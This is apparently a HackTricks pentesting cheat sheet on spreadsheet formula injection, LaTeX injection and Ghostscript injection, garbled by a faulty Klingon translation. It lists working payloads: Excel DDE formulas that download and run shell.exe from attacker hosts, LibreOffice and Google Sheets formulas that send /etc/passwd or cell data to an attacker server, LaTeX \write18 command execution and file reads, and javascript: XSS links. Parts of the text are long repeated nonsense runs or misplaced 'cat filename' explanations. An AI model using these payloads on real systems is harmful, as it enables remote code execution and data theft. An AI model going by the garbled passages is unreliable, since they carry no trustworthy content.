# Formula/CSV/Doc/LaTeX/GhostScript Injection

<details>

<summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>!</strong></a><strong> 'e' vItlhutlh</strong></summary>

HackTricks vItlhutlh:

* **HackTricks** 'e' **tlhIngan Hol** **company** **advertised** **want** **download HackTricks** **PDF** [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) **Check**!
* [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Get**
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) **Discover**, [**NFTs**](https://opensea.io/collection/the-peass-family) **collection** **exclusive** **our**
* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) **Join** **the** or **telegram group**](https://t.me/peass) **the** [**follow** **us** **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **hacking tricks** **Share** **your** **submitting PRs** [**HackTricks**](https://github.com/carlospolop/hacktricks) **the** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **github repos**.

</details>

<figure><img src="../.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>

Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today.

{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}

***

## Formula Injection

### Info

If your **input** is being **reflected** inside **CSV file**s (or any other file that is probably going to be opened by **Excel**), you maybe able to put Excel **formulas** that will be **executed** when the user **opens the file** or when the user **clicks on some link** inside the excel sheet.

{% hint style="danger" %}
Nowadays **Excel will alert** (several times) the **user when something is loaded from outside the Excel** in order to prevent him to from malicious action. Therefore, special effort on Social Engineering must be applied to he final payload.
{% endhint %}

### [Wordlist](https://github.com/payloadbox/csv-injection-payloads)
```
DDE ("cmd";"/C calc";"!A0")A0
@SUM(1+9)*cmd|' /C calc'!A0
=10+20+cmd|' /C calc'!A0
=cmd|' /C notepad'!'A1'
=cmd|'/C powershell IEX(wget attacker_server/shell.exe)'!A0
=cmd|'/c rundll32.exe \\10.0.0.1\3\2\1.dll,0'!_xlbgnm.A1
```
### Hyperlink

**Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'! Qapla'!
```markdown
`=cmd|' /C calc'!xxx`
```
Additional commands can also be executed, such as downloading and executing a file using PowerShell:

```
$command = "powershell -c (New-Object System.Net.WebClient).DownloadFile('http://evil.com/malicious-file.exe', 'C:\temp\malicious-file.exe'); Start-Process 'C:\temp\malicious-file.exe'"
```

This command downloads a file from a specified URL and saves it to the local system. It then executes the downloaded file using the `Start-Process` command.
```bash
=cmd|' /C powershell Invoke-WebRequest "http://www.attacker.com/shell.exe" -OutFile "$env:Temp\shell.exe"; Start-Process "$env:Temp\shell.exe"'!A1
```
### Local File Inclusion (LFI) in LibreOffice Calc

LibreOffice Calc can be used to read local files and exfiltrate data. Here are some methods:

- Reading the first line from the local `/etc/passwd` file: `='file:///etc/passwd'#$passwd.A1`
- Exfiltrating the read data to an attacker-controlled server: `=WEBSERVICE(CONCATENATE("http://<attacker IP>:8080/",('file:///etc/passwd'#$passwd.A1)))`
- Exfiltrating more than one line: `=WEBSERVICE(CONCATENATE("http://<attacker IP>:8080/",('file:///etc/passwd'#$passwd.A1)&CHAR(36)&('file:///etc/passwd'#$passwd.A2)))`
- DNS exfiltration (sending read data as DNS queries to an attacker-controlled DNS server): `=WEBSERVICE(CONCATENATE((SUBSTITUTE(MID((ENCODEURL('file:///etc/passwd'#$passwd.A19)),1,41),"%","-")),".<attacker domain>"))`

### Google Sheets for Out-of-Band (OOB) Data Exfiltration

Google Sheets offers functions that can be exploited for OOB data exfiltration:

- **CONCATENATE**: Appends strings together - `=CONCATENATE(A2:E2)`
- **IMPORTXML**: Imports data from structured data types - `=IMPORTXML(CONCAT("http://<attacker IP:Port>/123.txt?v=", CONCATENATE(A2:E2)), "//a/a10")`
- **IMPORTFEED**: Imports RSS or ATOM feeds - `=IMPORTFEED(CONCAT("http://<attacker IP:Port>//123.txt?v=", CONCATENATE(A2:E2)))`
- **IMPORTHTML**: Imports data from HTML tables or lists - `=IMPORTHTML (CONCAT("http://<attacker IP:Port>/123.txt?v=", CONCATENATE(A2:E2)),"table",1)`
- **IMPORTRANGE**: Imports a range of cells from another spreadsheet - `=IMPORTRANGE("https://docs.google.com/spreadsheets/d/[Sheet_Id]", "sheet1!A2:E2")`
- **IMAGE**: Inserts an image into a cell - `=IMAGE("https://<attacker IP:Port>/images/srpr/logo3w.png")`


## LaTeX Injection

Usually the servers that will find on the internet that **convert LaTeX code to PDF** use **`pdflatex`**.\
This program uses 3 main attributes to (dis)allow command execution:

* **`--no-shell-escape`**: **Disable** the `\write18{command}` construct, even if it is enabled in the texmf.cnf file.
* **`--shell-restricted`**: Same as `--shell-escape`, but **limited** to a 'safe' set of **predefined** \*\*commands (\*\*On Ubuntu 16.04 the list is in `/usr/share/texmf/web2c/texmf.cnf`).
* **`--shell-escape`**: **Enable** the `\write18{command}` construct. The command can be any shell command. This construct is normally disallowed for security reasons.

However, there are other ways to execute commands, so to avoid RCE it's very important to use `--shell-restricted`.

### Read file <a href="#read-file" id="read-file"></a>

You might need to adjust injection with wrappers as \[ or $.
```bash
\input{/etc/passwd}
\include{password} # load .tex file
\lstinputlisting{/usr/share/texmf/web2c/texmf.cnf}
\usepackage{verbatim}
\verbatiminput{/etc/passwd}
```
#### QaD jImej file

To read a single-lined file, you can use the following command:

```bash
cat filename
```

This command will display the contents of the file on the terminal.
```bash
\newread\file
\openin\file=/etc/issue
\read\file to\line
\text{\line}
\closein\file
```
#### QaStaHvIS file

To read a file that contains multiple lines, you can use the following command:

```
cat filename
```

This command will display the contents of the file on the screen.
```bash
\newread\file
\openin\file=/etc/passwd
\loop\unless\ifeof\file
\read\file to\fileline
\text{\fileline}
\repeat
\closein\file
```
### QISaHbe' <a href="#write-file" id="write-file"></a>
```bash
\newwrite\outfile
\openout\outfile=cmd.tex
\write\outfile{Hello-world}
\closeout\outfile
```
### Command execution <a href="#command-execution" id="command-execution"></a>

**tlhIngan Hol translation:**

**Command execution** <a href="#command-execution" id="command-execution"></a>

**Qap** vItlhutlh **stdin**-Daq **command**-e' **input**. **Temp file** vItlhutlh vItlhutlh'e'.
```bash
\immediate\write18{env > output}
\input{output}

\input{|"/bin/hostname"}
\input{|"extractbb /etc/passwd > /tmp/b.tex"}

# allowed mpost command RCE
\documentclass{article}\begin{document}
\immediate\write18{mpost -ini "-tex=bash -c (id;uname${IFS}-sm)>/tmp/pwn" "x.mp"}
\end{document}

# If mpost is not allowed there are other commands you might be able to execute
## Just get the version
\input{|"bibtex8 --version > /tmp/b.tex"}
## Search the file pdfetex.ini
\input{|"kpsewhich pdfetex.ini > /tmp/b.tex"}
## Get env var value
\input{|"kpsewhich -expand-var=$HOSTNAME > /tmp/b.tex"}
## Get the value of shell_escape_commands without needing to read pdfetex.ini
\input{|"kpsewhich --var-value=shell_escape_commands > /tmp/b.tex"}
```
<!-- TRANSLATION STARTS -->

<!-- ATTENTION: Do not translate the following text -->
If you get any LaTex error, consider using base64 to get the result without bad characters

<!-- ATTENTION: Translate the following text -->
ghItlh 'e' vItlhutlh LaTex 'e' vItlhutlh, base64 vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh v
```bash
\immediate\write18{env | base64 > test.tex}
\input{text.tex}
```

```bash
\input|ls|base4
\input{|"/bin/hostname"}
```
### Cross Site Scripting <a href="#cross-site-scripting" id="cross-site-scripting"></a>

From [@EdOverflow](https://twitter.com/intigriti/status/1101509684614320130)
```bash
\url{javascript:alert(1)}
\href{javascript:alert(1)}{placeholder}
```
## Ghostscript Injection

**Check [https://blog.redteam-pentesting.de/2023/ghostscript-overview/](https://blog.redteam-pentesting.de/2023/ghostscript-overview/)**

## References

* [https://notsosecure.com/data-exfiltration-formula-injection-part1](https://notsosecure.com/data-exfiltration-formula-injection-part1)
* [https://0day.work/hacking-with-latex/](https://0day.work/hacking-with-latex/)
* [https://salmonsec.com/cheatsheet/latex\_injection](https://salmonsec.com/cheatsheet/latex\_injection)
* [https://scumjr.github.io/2016/11/28/pwning-coworkers-thanks-to-latex/](https://scumjr.github.io/2016/11/28/pwning-coworkers-thanks-to-latex/)

<figure><img src="../.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>

Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today.

{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}

<details>

<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Other ways to support HackTricks:

* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>